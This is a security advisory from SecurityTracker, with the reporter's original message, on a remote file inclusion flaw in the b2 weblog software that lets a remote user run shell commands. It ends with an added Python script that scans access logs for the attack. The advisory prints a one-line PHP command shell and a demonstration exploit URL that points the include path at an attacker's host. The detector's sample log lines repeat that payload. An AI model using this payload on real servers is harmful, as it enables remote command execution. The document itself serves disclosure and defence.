SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   b2
Vendors:   Valdrighi, Michel
b2 Weblog Software Uses Relative Include Path That Allows Remote Users to Execute Arbitrary Shell Commands on the System
SecurityTracker Alert ID:  1004223
SecurityTracker URL:  http://securitytracker.com/id/1004223
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 7 2002
Impact:   Execution of arbitrary code via network, User access via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): b2 0.6pre2 and prior versions
Description:   A vulnerability was reported in the 'b2' news forum software. A remote user can execute arbitrary commands on the system with the privileges of the web server.

It is reported that the /b2-include/b2edit.showposts.php script uses a relative definition for the b2functions.php include statement. Because of this, a remote user can define an alternate path for b2functions.php, including one on a remote server. The file can contain malicious code, such as:

<?
system($cmd);
?>

The author of the report notes that the remote user's server must serve the malicious file as text rather than execute it as PHP.

The following demonstration exploit URL, which will execute the 'ls' command on the target host, is provided:

http://[targethost]/b2/b2-include/b2edit.showposts.php?b2inc=http://[malicioushost]&cmd=ls

Impact:   A remote user can execute arbitrary shell commands on the server with the privileges of the web server.
Solution:   The vendor has described the following fix:

Create a file named b2config.php and upload it to your b2-include folder. According to the vendor, the file can be blank or a copy of your original b2config.php file; it apparently doesn't matter which.

Vendor URL:  www.cafelog.com/
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   None.


 Source Message Contents

Subject:  b2 php remote command execution




Site: www.cafelog.com
Vulnerable:

b2 0.6pre2 and earlier.

B2 is a php script which allows webmasters to quickly post 
news on the frontpage and let viewers interact with 
each other. A bug exists in the scripts which allows an 
attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php
 
*snippet*
 
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
 
*snippet*
 
But since b2config.php does not exist inside the directory, 
an attacker can define $b2inc himself.
So if the attacker creates a file on his server, for 
example www.attacker.com , called b2functions.php, and he 
writes the following in it :
 
<? 
system($cmd);
?>
 
(note : the attacker's server must not be able to run php, 
it has to open the file as text)
 
he can include the file like this :
 
http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls
 
This would execute the ls command on vulnerablehost.com.

Fix:
Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same 
fix a few days earlier. 
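
A defender-side check for the request pattern described in this advisory, as an added example that is not part of the original advisory or the reporter's message: it scans web server access-log lines for requests under /b2-include/ that supply the b2inc parameter, and flags values that start with a URL scheme separately. The log lines, addresses and host names are constructed samples, and the common/combined log format is an assumption.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of a common/combined-format access-log line.
REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# A value that starts with a URL scheme (http://, ftp://, ...).
SCHEME_RE = re.compile(r"^\s*[a-z][a-z0-9+.-]*://", re.IGNORECASE)

# Constructed sample lines; addresses and host names are placeholders.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/May/2002:10:00:01 +0000] "GET /b2/index.php?p=12 HTTP/1.0" 200 5120',
    '192.0.2.10 - - [07/May/2002:10:00:05 +0000] "GET /b2/b2-include/b2edit.showposts.php HTTP/1.0" 200 310',
    '203.0.113.7 - - [07/May/2002:10:02:11 +0000] "GET /b2/b2-include/b2edit.showposts.php?b2inc=http://attacker.example&cmd=ls HTTP/1.0" 200 944',
    '203.0.113.7 - - [07/May/2002:10:02:40 +0000] "GET /b2/b2%2Dinclude/b2edit.showposts.php?b2inc=HTTP%3A%2F%2Fattacker.example HTTP/1.0" 200 944',
    '203.0.113.9 - - [07/May/2002:10:03:02 +0000] "GET /b2/b2-include/b2edit.showposts.php?b2inc=/tmp HTTP/1.0" 200 120',
]


def classify(line):
    """Return 'remote', 'override' or None for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return None
    target = urlsplit(match.group(1))
    # Decode the path so /b2%2Dinclude/ is treated like /b2-include/.
    if "/b2-include/" not in unquote(target.path):
        return None
    # parse_qs percent-decodes parameter names and values.
    values = parse_qs(target.query, keep_blank_values=True).get("b2inc")
    if values is None:
        return None  # include path not supplied by the client
    if any(SCHEME_RE.match(v) for v in values):
        return "remote"  # include would be fetched from another host
    return "override"  # client still controls the include directory


def scan(lines):
    """Return (line_number, verdict) for every suspicious line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        verdict = classify(line)
        if verdict:
            hits.append((number, verdict))
    return hits


if __name__ == "__main__":
    for number, verdict in scan(SAMPLE_LOG):
        print(f"line {number}: {verdict}")
```

Standard access logs record only the request line, so a b2inc value sent in a POST body or cookie would not show up in this scan.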

 
 

